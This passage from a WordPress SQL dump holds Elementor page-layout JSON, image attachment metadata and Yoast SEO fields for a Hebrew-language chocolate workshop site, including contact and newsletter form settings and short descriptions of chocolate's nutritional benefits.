"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_size\":\"md\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e6\\u05d5\\u05e8 \\u05e7\\u05e9\\u05e8 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"button_background_color\":\"#692910\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a330bc8\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5b761419\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3e0c5e0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1c71ccd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"786d6b73\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b8f8c19\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"388c6046\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"6bd4621c\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6c50c739\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"129cbc32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"75b11280\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f0bfe06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5dfe763\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1320,265,'_elementor_version','0.4'),(1321,265,'_elementor_template_type','post'),(1326,266,'_edit_last','1'),(1327,266,'_edit_lock','1540971939:1'),(1328,267,'_wp_attached_file','2018/10/chocolates-3141165_640.jpg'),(1329,267,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:511;s:4:\"file\";s:34:\"2018/10/chocolates-3141165_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"chocolates-3141165_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"chocolates-3141165_640-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:34:\"chocolates-3141165_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1330,267,'_wp_attachment_image_alt','זר שוקולד'),(1331,266,'_thumbnail_id','267'),(1332,266,'_wp_page_template','default'),(1335,266,'_yoast_wpseo_primary_category','7'),(1338,270,'_edit_last','1'),(1339,270,'_edit_lock','1540972033:1'),(1340,271,'_wp_attached_file','2018/10/שוקולד-ותזונה-לאחר-אימון.jpg'),(1341,271,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:334;s:4:\"file\";s:57:\"2018/10/שוקולד-ותזונה-לאחר-אימון.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"שוקולד-ותזונה-לאחר-אימון-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"שוקולד-ותזונה-לאחר-אימון-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:57:\"שוקולד-ותזונה-לאחר-אימון-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1342,271,'_wp_attachment_image_alt','סדנאות שוקולד'),(1343,270,'_thumbnail_id','271'),(1344,270,'_wp_page_template','default'),(1347,270,'_yoast_wpseo_title','שוקולד ותזונה לאחר אימון - שוקולד4U'),(1348,270,'_yoast_wpseo_metadesc','מתאמנים רבים מבינים את החשיבות של תזונה נכונה לאחר האימון. הגוף מותש, השרירים כואבים, והדבר היחיד שיסייע לגוף להתאושש ולהתחזק – זאת התזונה שלנו.'),(1349,270,'_yoast_wpseo_primary_category','7'),(1350,273,'_edit_last','1'),(1351,273,'_edit_lock','1540972209:1'),(1352,274,'_wp_attached_file','2018/10/שוקולד-מקור-לאנרגיה-וכל-זה-ללא-חלבונים.jpg'),(1353,274,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:334;s:4:\"file\";s:82:\"2018/10/שוקולד-מקור-לאנרגיה-וכל-זה-ללא-חלבונים.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:82:\"שוקולד-מקור-לאנרגיה-וכל-זה-ללא-חלבונים-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:82:\"שוקולד-מקור-לאנרגיה-וכל-זה-ללא-חלבונים-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:82:\"שוקולד-מקור-לאנרגיה-וכל-זה-ללא-חלבונים-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1354,274,'_wp_attachment_image_alt','סדנאות שוקולד'),(1355,273,'_thumbnail_id','274'),(1356,273,'_wp_page_template','default'),(1359,273,'_yoast_wpseo_title','שוקולד, מקור לאנרגיה וכל זה ללא חלבונים - שוקולד4U'),(1360,273,'_yoast_wpseo_metadesc','היתרון הוא, שלצד הבריאות וכמות גדולה של אנטי-אוקסידנטים, השוקולד הוא גם טעים, ויש שיגידו ששוקולד הוא המאכל האהוב עליהם- כנסו לגלות במה הוא עוד תורם'),(1361,273,'_yoast_wpseo_primary_category','7'),(1362,277,'_edit_last','1'),(1363,277,'_edit_lock','1582927234:1'),(1364,277,'_wp_page_template','default'),(1367,277,'_yoast_wpseo_title','מהם היתרונות התזונתיים של השוקולד? - שוקולד4U'),(1368,277,'_yoast_wpseo_metadesc','שוקולד, אולי אחד המאכלים האהובים ביותר בעולם, נחשב בריא כשהוא מגיע במינונים נכונים. פולי הקקאו, מהם עשוי השוקולד, נכנסו לא פעם לרשימת מזונות-העל'),(1369,277,'_yoast_wpseo_primary_category','7'),(1370,279,'_wp_attached_file','2018/10/chocolate-3387207_640.jpg'),(1371,279,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:359;s:4:\"file\";s:33:\"2018/10/chocolate-3387207_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"chocolate-3387207_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"chocolate-3387207_640-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:33:\"chocolate-3387207_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1372,279,'_wp_attachment_image_alt','סדנאות שוקולד'),(1373,277,'_thumbnail_id','279'),(1376,281,'_wp_page_template','elementor_header_footer'),(1377,281,'_elementor_edit_mode','builder'),(1378,281,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd \\u05d5\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New 